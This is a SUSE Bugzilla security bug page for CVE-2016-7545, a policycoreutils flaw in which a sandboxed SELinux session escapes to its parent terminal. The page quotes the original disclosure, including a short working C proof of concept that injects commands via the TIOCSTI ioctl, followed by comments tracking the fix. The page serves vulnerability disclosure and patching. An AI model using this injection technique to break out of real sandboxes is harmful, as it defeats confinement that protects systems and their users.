First Last Prev Next    This bug is not in your last search results.
Bug 1000998 - (CVE-2016-7545) VUL-1: CVE-2016-7545: policycoreutils: nonpriv session can escape to the parent session
(CVE-2016-7545)
VUL-1: CVE-2016-7545: policycoreutils: nonpriv session can escape to the pare...
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Johannes Segitz
Security Team bot
CVSSv2:RedHat:CVE-2016-2779:6.8:(AV:N...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2016-09-25 22:02 UTC by Mikhail Kasimov
Modified: 2017-12-22 12:32 UTC (History)
0 users

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Mikhail Kasimov 2016-09-25 22:02:02 UTC 
CVE-2016-7545 info: http://seclists.org/oss-sec/2016/q3/606

==========
Hi,

When executing a program via the SELinux sandbox, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
    char *cmd = "id\n";
    while(*cmd)
     ioctl(0, TIOCSTI, cmd++);
    execlp("/bin/id", "id", NULL);
}

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000
context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
$ id    <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Bug report:
https://bugzilla.redhat.com/show_bug.cgi?id=1378577

Upstream fix:
https://marc.info/?l=selinux&m=147465160112766&w=2
https://marc.info/?l=selinux&m=147466045909969&w=2
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

Federico Bento.
==========

Red Hat Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1378577
Comment 1 Swamp Workflow Management 2016-09-26 22:00:13 UTC 
bugbot adjusting priority
Comment 2 Johannes Segitz 2016-09-27 09:35:26 UTC 
Sandboxing has been broken for a while. Will have a look at this this or next week.
Comment 3 Swamp Workflow Management 2017-01-31 15:08:52 UTC 
SUSE-SU-2017:0338-1: An update that fixes one vulnerability is now available.

Category: security (low)
Bug References: 1000998
CVE References: CVE-2016-7545
Sources used:
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    policycoreutils-2.5-6.1
SUSE Linux Enterprise Server 12-SP2 (src):    policycoreutils-2.5-6.1
Comment 4 Swamp Workflow Management 2017-01-31 15:09:18 UTC 
SUSE-SU-2017:0339-1: An update that fixes one vulnerability is now available.

Category: security (low)
Bug References: 1000998
CVE References: CVE-2016-7545
Sources used:
SUSE Linux Enterprise Server 11-SP4 (src):    policycoreutils-2.0.79-4.8.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    policycoreutils-2.0.79-4.8.1
Comment 5 Swamp Workflow Management 2017-01-31 15:09:41 UTC 
SUSE-SU-2017:0340-1: An update that fixes one vulnerability is now available.

Category: security (low)
Bug References: 1000998
CVE References: CVE-2016-7545
Sources used:
SUSE Linux Enterprise Server 12-SP1 (src):    policycoreutils-2.3-3.3.1
Comment 6 Johannes Segitz 2017-12-22 12:32:57 UTC 
fixed
First Last Prev Next    This bug is not in your last search results.